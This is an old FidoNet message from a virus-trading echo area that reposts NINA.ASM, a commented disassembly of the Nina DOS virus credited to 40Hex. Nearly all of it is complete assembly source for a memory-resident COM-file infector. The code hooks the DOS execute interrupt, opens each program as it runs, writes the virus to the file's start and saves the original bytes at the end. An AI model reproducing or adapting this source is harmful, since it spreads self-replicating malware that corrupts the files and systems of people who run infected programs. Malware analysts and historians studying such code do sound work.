;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä ; Msg : 35 of 54 ; From : MeteO 2:5030/136 Tue 09 Nov 93 09:14 ; To : - *.* - Fri 11 Nov 94 08:10 ; Subj : NINA.ASM ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ;.RealName: Max Ivanov ;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ ;* Kicked-up by MeteO (2:5030/136) ;* Area : VIRUS (Int: ˆ­ä®p¬ æ¨ï ® ¢¨pãá å) ;* From : Daniel Hendry, 2:283/718 (06 Nov 94 17:37) ;* To : Viral Doctor ;* Subj : NINA.ASM ;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ ;@RFC-Path: ;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 ;18.n283!not-for-mail ;@RFC-Return-Receipt-To: Daniel.Hendry@f718.n283.z2.fidonet.org .model tiny .code org 100h ; Disassembly done by Dark Angel of Phalcon/Skism ; for 40Hex Number 9, Volume 2 Issue 5 start: push ax mov ax,9753h ; installation check int 21h mov ax,ds dec ax mov ds,ax ; ds->program MCB mov ax,ds:[3] ; get size word push bx push es sub ax,40h ; reserve 40h paragraphs mov bx,ax mov ah,4Ah ; Shrink memory allocation int 21h mov ah,48h ; Allocate 3Fh paragraphs mov bx,3Fh ; for the virus int 21h mov es,ax ; copy virus to high xor di,di ; memory mov si,offset start + 10h ; start at MCB:110h mov cx,100h ; (same as PSP:100h) rep movsb sub ax,10h ; adjust offset as if it push ax ; originated at 100h mov ax,offset highentry push ax retf endfile dw 100h ; size of infected COM file highentry: mov byte ptr cs:[0F2h],0AAh ; change MCB's owner so the ; memory isn't freed when the ; program terminates mov ax,3521h ; get int 21h vector int 21h mov word ptr cs:oldint21,bx ; save it mov word ptr cs:oldint21+2,es push es pop ds mov dx,bx mov ax,2591h ; redirect int 91h to int 21h int 21h push cs pop ds mov dx,offset int21 mov al,21h ; set int 21h to virus vector int 21h pop ds ; ds->original program PSP pop bx push ds pop es return_COM: mov di,100h ; restore original mov si,endfile ; file add si,di ; adjust for COM starting mov cx,100h ; offset rep movsb pop ax push ds ; jmp back to original mov bp,100h ; file (PSP:100) push bp retf exit_install: pop ax ; pop CS:IP and flags in pop ax ; order to balance the pop ax ; stack and then exit the jmp short return_COM ; infected COM file int21: cmp ax,9753h ; installation check? je exit_install cmp ax,4B00h ; execute? jne exitint21 ; nope, quit push ax ; save registers push bx push cx push dx push ds call infect pop ds ; restore registers pop dx pop cx pop bx pop ax exitint21: db 0eah ; jmp far ptr oldint21 dd ? infect: mov ax,3D02h ; open file read/write int 91h jc exit_infect mov bx,ax mov cx,100h push cs pop ds mov ah,3Fh ; Read first 100h bytes mov dx,offset endvirus int 91h mov ax,word ptr endvirus cmp ax,'MZ' ; exit if EXE je close_exit_infect cmp ax,'ZM' ; exit if EXE je close_exit_infect cmp word ptr endvirus+2,9753h ; exit if already je close_exit_infect ; infected mov al,2 ; go to end of file call move_file_pointer cmp ax,0FEB0h ; exit if too large ja close_exit_infect cmp ax,1F4h ; or too small for jb close_exit_infect ; infection mov endfile,ax ; save file size call write mov al,0 ; go to start of file call move_file_pointer mov dx,100h ; write virus call write close_exit_infect: mov ah,3Eh ; Close file int 91h exit_infect: retn move_file_pointer: push dx xor cx,cx xor dx,dx mov ah,42h int 91h pop dx retn write: mov ah,40h mov cx,100h int 91h retn db 'Nina' endvirus: int 20h ; original COM file end start ;-+- Terminate 1.50/Pro ; + Origin: Rampton Birds' Box, +358-31-3564751, 28.800bps, 24h (2:283/718) ;============================================================================= ; ;Yoo-hooo-oo, -! ; ; ; þ The MeÂeO ; ;/yx Extended memory swapping ; ;--- Aidstest Null: /Kill ; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)